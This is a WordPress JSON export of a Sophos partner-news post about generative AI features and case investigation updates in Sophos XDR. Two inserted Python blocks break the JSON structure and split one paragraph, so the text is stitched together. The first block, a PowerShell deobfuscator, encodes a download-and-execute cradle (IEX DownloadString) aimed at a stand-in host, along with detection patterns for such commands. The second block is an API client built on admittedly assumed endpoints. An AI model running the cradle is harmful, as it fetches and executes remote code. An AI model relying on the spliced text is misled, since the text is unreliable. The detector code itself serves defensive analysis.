{"id":8456,"date":"2024-11-21T09:33:12","date_gmt":"2024-11-21T09:33:12","guid":{"rendered":"https:\/\/partnernews.sophos.com\/it-it\/?p=8456"},"modified":"2024-11-22T09:33:54","modified_gmt":"2024-11-22T09:33:54","slug":"sophos-xdr-new-generative-ai-functionality-and-case-investigation-enhancements","status":"publish","type":"post","link":"https:\/\/partnernews.sophos.com\/it-it\/2024\/11\/products\/sophos-xdr-new-generative-ai-functionality-and-case-investigation-enhancements\/","title":{"rendered":"Sophos XDR: New Generative AI Functionality and Case Investigation Enhancements"},"content":{"rendered":"<p>Defenders need all the help they can get. The Sophos XDR team has been focused on delivering features and functionality that expand and improve analysts&#8217; efficiency and their ability to detect and neutralize threats faster.<\/p>\n<p>The latest enhancements expand the power and capabilities of Sophos XDR with generative AI (genAI) and new case investigation functionality. The genAI features are focused on outcomes: accelerating investigations, enabling less experienced analysts to perform security operations, and neutralizing adversaries faster.<\/p>\n<table style=\"border-collapse: collapse; width: 100%; border: none;\">\n<tbody>\n<tr>\n<td style=\"width: 100%;\"><p>genAI capabilities are available as an opt-in for all licensed Sophos XDR customers, ensuring they remain in control. Customers can opt into these features in Sophos Central.<\/p>\n<p><iframe loading=\"lazy\" title=\"YouTube video player\" src=\"https:\/\/www.youtube.com\/embed\/bpOf5PtOKc8?si=qI2uvSRV48ZANo5b\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>AI Search<\/h2>\n<p>AI Search lets security analysts search large volumes of security data using natural language, making it easier to conduct investigations without advanced technical skills such as writing SQL. 
Powered by OpenAI&#8217;s large language models (LLMs), AI Search translates natural language queries into structured SQL queries that are executed against Sophos&#8217; data lake. Users can ask simple questions (e.g., &#8220;Show me all detections from the last week related to Windows Server&#8221;) and view results in a user-friendly format.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8654 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-search_f5f7f8.png\" alt=\"\" width=\"1600\" height=\"900\" \/><\/p>\n<p>For more details, please refer to the <a href=\"https:\/\/community.sophos.com\/sophos-xdr\/new-ai-features\/b\/announcements\/posts\/ai-search-for-detections\" target=\"_blank\" rel=\"noopener\">AI Search article<\/a> on the Sophos Community.<\/p>\n<p>&nbsp;<\/p>\n<h2>AI Case Summary<\/h2>\n<p>AI Case Summary\u00a0provides an easy-to-understand overview of detections and recommended next steps, helping analysts make smart decisions fast. This feature uses genAI to analyze detections associated with a case to summarize what has happened, the entities involved, and possible next steps for investigation. AI Case Summary also determines which MITRE ATT&amp;CK tactics, techniques and procedures (TTPs) are observed within the case, if any.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8655 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-cases.png\" alt=\"\" width=\"1600\" height=\"900\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2>AI Command Analysis<\/h2>\n<p>AI Command Analysis\u00a0provides insights into attacker behavior by examining potentially malicious commands that create detections. This feature uses genAI to analyze the command line executed in the customer\u2019s environment to explain the intent and describe the possible security impact on your environment. 
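<\/p>
<p>To make concrete what analysing the command line behind a detection involves, here is an added example; it is not Sophos&#8217; code and does not show how AI Command Analysis is implemented. It is a deterministic decoder for two PowerShell layers that turn up constantly in detections (an -EncodedCommand blob, and a base64 literal passed to FromBase64String inside it), folds the 'a'+'b' string splitting attackers use to dodge keyword matching, and then lists the behaviours the recovered layers reveal. The command line, the stage-2 script and the host name (an RFC 2606 reserved name) are constructed for the example so it runs offline.<\/p>

```python
import base64
import re

# Switch spellings PowerShell accepts for -EncodedCommand. PowerShell also
# accepts other unambiguous prefixes; this subset covers what is usually seen.
ENCODED_SWITCHES = {'-e', '-ec', '-enc', '-encodedcommand'}

# A base64 literal handed to [Convert]::FromBase64String(...) in either quote style.
INNER_B64_RE = re.compile(r'FromBase64String\(\s*[\x27\x22]([A-Za-z0-9+/=]+)[\x27\x22]\s*\)')
# Two adjacent single-quoted literals joined with +, e.g. ('Inv'+'oke'); folded repeatedly.
CONCAT_RE = re.compile(r'\x27([^\x27]*)\x27\s*\+\s*\x27([^\x27]*)\x27')

# Behaviours worth calling out in a summary, matched across every recovered layer.
INDICATORS = [
    (re.compile(r'-w(indowstyle)?\s+hidden', re.I), 'hidden window'),
    (re.compile(r'-(nop|noprofile)\b', re.I), 'profile skipped'),
    (re.compile(r'-(ex|exec|executionpolicy)\s+bypass', re.I), 'execution policy bypassed'),
    (re.compile(r'\b(iex|invoke-expression)\b', re.I), 'string executed as code'),
    (re.compile(r'downloadstring|invoke-webrequest|\biwr\b', re.I), 'remote content downloaded'),
]

SQ = chr(39)  # a single quote, kept out of the literals below for readability

# Constructed sample (not a real detection): a two-stage encoded one-liner.
# The host is an RFC 2606 reserved name, so nothing here resolves.
STAGE2 = 'IEX (New-Object Net.WebClient).DownloadString(' + SQ + 'http://example.invalid/a.ps1' + SQ + ')'
STAGE1 = ('$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(' + SQ
          + base64.b64encode(STAGE2.encode('utf-8')).decode('ascii') + SQ + '))\n'
          '& (' + SQ + 'Invoke' + SQ + '+' + SQ + '-Expression' + SQ + ') $s')
SAMPLE_CMDLINE = ('powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc '
                  + base64.b64encode(STAGE1.encode('utf-16-le')).decode('ascii'))


def decode_encoded_command(cmdline):
    '''Return the script hidden behind -EncodedCommand, or None if there is none.'''
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_SWITCHES:
            raw = base64.b64decode(tokens[i + 1], validate=True)
            return raw.decode('utf-16-le')  # PowerShell encodes the script as UTF-16LE
    return None


def _decode_guess(b64):
    '''Decode a base64 literal as text, trying UTF-8 then UTF-16LE; None if neither is clean text.'''
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    for encoding in ('utf-8', 'utf-16-le'):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if all(ch.isprintable() or ch in '\r\n\t' for ch in text):
            return text
    return None


def fold_string_concat(text):
    '''Join 'a'+'b' chains into one literal until no change remains.'''
    previous = None
    while previous != text:
        previous, text = text, CONCAT_RE.sub(lambda m: SQ + m.group(1) + m.group(2) + SQ, text)
    return text


def deobfuscate(cmdline):
    '''Recover every layer of an encoded command line, outermost first, as (how, script) pairs.'''
    top = decode_encoded_command(cmdline)
    if top is None:
        return []  # nothing encoded; the visible command line is the whole story
    layers = []
    queue = [('EncodedCommand (base64 of UTF-16LE)', top)]
    while queue:
        how, script = queue.pop(0)
        script = fold_string_concat(script)
        layers.append((how, script))
        for match in INNER_B64_RE.finditer(script):
            payload = _decode_guess(match.group(1))
            if payload is not None:
                queue.append(('FromBase64String literal', payload))
    return layers


def summarize(cmdline):
    '''What an analyst wants first: the decoded layers and the behaviours they reveal.'''
    layers = deobfuscate(cmdline)
    corpus = '\n'.join([cmdline] + [script for _, script in layers])
    indicators = sorted(name for pattern, name in INDICATORS if pattern.search(corpus))
    return {'layers': layers, 'indicators': indicators}


if __name__ == '__main__':
    report = summarize(SAMPLE_CMDLINE)
    for how, script in report['layers']:
        print('--', how)
        print(script)
    print('indicators:', ', '.join(report['indicators']))
```

<p>Run as a script it prints both recovered layers and the five indicators (hidden window, profile skipped, execution policy bypassed, string executed as code, remote content downloaded); the visible command line alone shows only the first three. The point of peeling layers before pattern matching is that the downloader and the Invoke-Expression call are invisible until the base64 and the string concatenation are undone, which is exactly the step that costs an analyst time.<\/p>
<p>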
AI Command Analysis also de-obfuscates the code it examines, reducing the complexity, time, and skill needed to assess a detection.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8656 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-command-analysis.png\" alt=\"\" width=\"1600\" height=\"900\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2>Coming Soon: AI Assistant<\/h2>\n<p>The Sophos AI Assistant is a conversational chat interface designed to elevate security operations. Underpinned by the Sophos Data Lake and a set of robust tools, the AI Assistant streamlines complex investigations using genAI to improve threat response, whatever your level of expertise.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8657 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-assistant.png\" alt=\"\" width=\"1180\" height=\"916\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2>Sophos and AI<\/h2>\n<p>Sophos combines AI and human expertise to stop the broadest range of threats wherever they occur. Security analysts are empowered to make smart decisions fast, and customers can operate confidently, knowing Sophos\u2019 robust, battle-proven AI solutions are on their side.<\/p>\n<p>Since 2017, Sophos has been elevating cybersecurity with AI. Deep learning and genAI capabilities are embedded at every point and delivered through the industry&#8217;s largest, most scalable, open AI platform. Sophos\u2019 AI-powered products and services secure over 600,000 organizations from cyberattacks and breaches.<\/p>\n<p>&nbsp;<\/p>\n<h2>New case investigation enhancements<\/h2>\n<p>When an analyst looks at the specifics of a detection as part of a case, they now benefit from a refreshed and simplified pivot menu interface with new quick actions and updated queries. 
The pivot menu allows an analyst to select key information from a detection, using it as a starting point for deeper investigation and immediate action. Here\u2019s what\u2019s new:<\/p>\n<ul>\n<li>Run actions: We have added the ability to isolate and unisolate devices directly from the pivot menu, allowing users to remediate quickly without losing context.<\/li>\n<li>Run Live Discover and Search Data Lake: The queries list has been updated to feature the most frequently used queries.<\/li>\n<li>Copy Device Name: Easily copy the device name to your clipboard.<\/li>\n<li>Detections with device: Go straight to the detections page to see all detections associated with the device. The default time range is the last 24 hours.<\/li>\n<li>Device Details: Navigate directly to the device details page for more in-depth information.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8658 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-device-details.png\" alt=\"\" width=\"915\" height=\"415\" \/><\/p>\n<p>The Cases public API has been enhanced, allowing customers and partners to create, update, and delete cases using their preferred tools. With this new functionality, customers can easily modify key fields such as case status, severity, and case summary, enabling more effective prioritization and faster triage times. These improvements are designed to give customers more flexibility in their workflows and help address issues more efficiently. 
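<\/p>
<p>As an added example of driving the case updates described here from your own tooling (not Sophos&#8217; code and not taken from the Cases API Guide), the client below walks the Sophos Central API flow that every tenant-level call needs: a client-credentials token from the identity service, a whoami call to learn the tenant ID and the regional API host, and then the call itself with the bearer token and the X-Tenant-ID header. The token and whoami URLs are the documented Sophos Central entry points; the case resource path, the use of PATCH, and the status and severity vocabularies are assumptions to be replaced with the values in the Cases API Guide. The RecordingTransport is a constructed stand-in that records requests and answers with canned JSON, so the example runs offline.<\/p>

```python
import json
import time
import urllib.parse
import urllib.request

# Documented Sophos Central entry points: client-credentials token, then whoami
# to learn the tenant ID and the regional API host every later call must use.
TOKEN_URL = 'https://id.sophos.com/api/v2/oauth2/token'
WHOAMI_URL = 'https://api.central.sophos.com/whoami/v1'
# Assumed: the case resource path and the vocabularies below are placeholders;
# take the real ones from the Cases API Guide before using this against a tenant.
CASES_PATH = '/cases/v1/cases'
ALLOWED_STATUS = {'new', 'inProgress', 'onHold', 'resolved', 'closed'}
ALLOWED_SEVERITY = {'low', 'medium', 'high', 'critical'}


def urllib_transport(method, url, headers, body):
    '''Live transport: send the request and return (HTTP status, parsed JSON body).'''
    request = urllib.request.Request(url, data=body, method=method, headers=headers)
    with urllib.request.urlopen(request, timeout=30) as response:
        return response.status, json.loads(response.read().decode('utf-8'))


class CentralClient:
    def __init__(self, client_id, client_secret, transport=urllib_transport):
        self._client_id = client_id
        self._client_secret = client_secret
        self._transport = transport
        self._token = None
        self._token_expiry = 0.0
        self._tenant_id = None
        self._data_region = None

    def _access_token(self):
        '''Fetch a bearer token, reusing it until a minute before it expires.'''
        if self._token and time.time() < self._token_expiry - 60:
            return self._token
        form = urllib.parse.urlencode({
            'grant_type': 'client_credentials', 'scope': 'token',
            'client_id': self._client_id, 'client_secret': self._client_secret,
        }).encode('ascii')
        status, data = self._transport('POST', TOKEN_URL,
                                       {'Content-Type': 'application/x-www-form-urlencoded'}, form)
        if status != 200:
            raise RuntimeError('token request failed: %s' % status)
        self._token = data['access_token']
        self._token_expiry = time.time() + int(data.get('expires_in', 3600))
        return self._token

    def _tenant(self):
        '''Resolve (tenant ID, regional host); refuse partner or organization credentials.'''
        if self._tenant_id is None:
            headers = {'Authorization': 'Bearer ' + self._access_token()}
            status, data = self._transport('GET', WHOAMI_URL, headers, None)
            if status != 200 or data.get('idType') != 'tenant':
                raise RuntimeError('expected tenant credentials, got %s' % data.get('idType'))
            self._tenant_id = data['id']
            self._data_region = data['apiHosts']['dataRegion']
        return self._tenant_id, self._data_region

    def update_case(self, case_id, status=None, severity=None, summary=None):
        '''PATCH only the fields given, after checking them locally.'''
        fields = {}
        if status is not None:
            if status not in ALLOWED_STATUS:
                raise ValueError('unknown status: %s' % status)
            fields['status'] = status
        if severity is not None:
            if severity not in ALLOWED_SEVERITY:
                raise ValueError('unknown severity: %s' % severity)
            fields['severity'] = severity
        if summary is not None:
            fields['summary'] = summary.strip()
        if not fields:
            raise ValueError('nothing to update')
        tenant_id, region = self._tenant()
        headers = {
            'Authorization': 'Bearer ' + self._access_token(),
            'X-Tenant-ID': tenant_id,  # tenant-scoped calls need this header
            'Content-Type': 'application/json',
        }
        url = region + CASES_PATH + '/' + urllib.parse.quote(case_id, safe='')
        status_code, data = self._transport('PATCH', url, headers, json.dumps(fields).encode('utf-8'))
        if status_code != 200:
            raise RuntimeError('case update failed: %s %s' % (status_code, data))
        return data


class RecordingTransport:
    '''Constructed offline stand-in: records every request and answers with canned JSON.'''
    def __init__(self):
        self.calls = []

    def __call__(self, method, url, headers, body):
        self.calls.append((method, url, headers, body))
        if url == TOKEN_URL:
            return 200, {'access_token': 'tok-1', 'expires_in': 3600, 'token_type': 'bearer'}
        if url == WHOAMI_URL:
            return 200, {'id': 'tenant-0001', 'idType': 'tenant',
                         'apiHosts': {'global': 'https://api.central.sophos.com',
                                      'dataRegion': 'https://api-eu01.central.sophos.com'}}
        return 200, dict(json.loads(body), id=url.rsplit('/', 1)[-1])


def demo():
    '''Run two updates through the stand-in; returns the recorded calls and the responses.'''
    transport = RecordingTransport()
    client = CentralClient('client-id', 'client-secret', transport=transport)
    first = client.update_case('case-1', status='inProgress', severity='high')
    second = client.update_case('case-1', summary='Encoded PowerShell on one host; device isolated ')
    return transport.calls, first, second


if __name__ == '__main__':
    for method, url, headers, body in demo()[0]:
        print(method, url, body)
```

<p>Two choices are worth keeping when you adapt this: the client refuses non-tenant credentials up front, because partner and organization credentials need a different tenant-selection step, and it validates status and severity locally so a typo in an automation job fails before it ever reaches the API rather than turning into a half-applied update.<\/p>
<p>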
Please refer to the <a href=\"https:\/\/developer.sophos.com\/cases\" target=\"_blank\" rel=\"noopener\">Cases API Guide<\/a> for more details.<\/p>\n<p>&nbsp;<\/p>\n<h2>Recognized by industry experts and customers<\/h2>\n<p>Sophos XDR continues to garner high praise from customers and industry experts for superior detection, investigation, and response capabilities.<\/p>\n<p>Recent proof points include:<\/p>\n<ul>\n<li>Sophos XDR was named a Leader across five different segments in the G2 Fall 2024 Reports. Read the report <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/09\/30\/the-power-of-the-platform-sophos-is-uniquely-recognized-in-the-g2-fall-2024-reports\/\" target=\"_blank\" rel=\"noopener\">here<\/a><\/li>\n<li>A Leader in the 2024 Gartner\u00ae Magic Quadrant\u2122 for Endpoint Protection Platforms for the 15th consecutive time. Read the news article <a href=\"https:\/\/partnernews.sophos.com\/en-us\/2024\/09\/resources\/sophos-named-a-leader-in-the-2024-gartner-magic-quadrant-for-endpoint-protection-platforms\/\" target=\"_blank\" rel=\"noopener\">here<\/a><\/li>\n<li>Over 43,000 customers using Sophos XDR today<\/li>\n<li>\u2018Why Sophos\u2019 page on <a href=\"https:\/\/www.sophos.com\/why\" target=\"_blank\" rel=\"noopener\">sophos.com<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Resources<\/h2>\n<ul>\n<li><a href=\"https:\/\/community.sophos.com\/sophos-xdr\/new-ai-features\" target=\"_blank\" rel=\"noopener\">Sophos Community: New AI Features<\/a><\/li>\n<li><a href=\"https:\/\/www.youtube.com\/watch?v=bpOf5PtOKc8\" target=\"_blank\" rel=\"noopener\">Outcome-focused AI Video<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Our latest features include new generative AI functionality and case investigation enhancements in Sophos 
XDR.<\/p>\n","protected":false},"author":11,"featured_media":3000007079,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[70],"tags":[32,107,104],"coauthors":[42],"class_list":["post-8456","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-products","tag-intercept-x","tag-sophos-endpoint","tag-sophos-xdr"],"jetpack_featured_media_url":"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2023\/11\/featured-image-sophos-xdr.png","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts\/8456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/comments?post=8456"}],"version-history":[{"count":1,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts\/8456\/revisions"}],"predecessor-version":[{"id":8465,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts\/8456\/revisions\/8465"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/media?parent=8456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/categories?post=8456"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/tags?
post=8456"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/coauthors?post=8456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}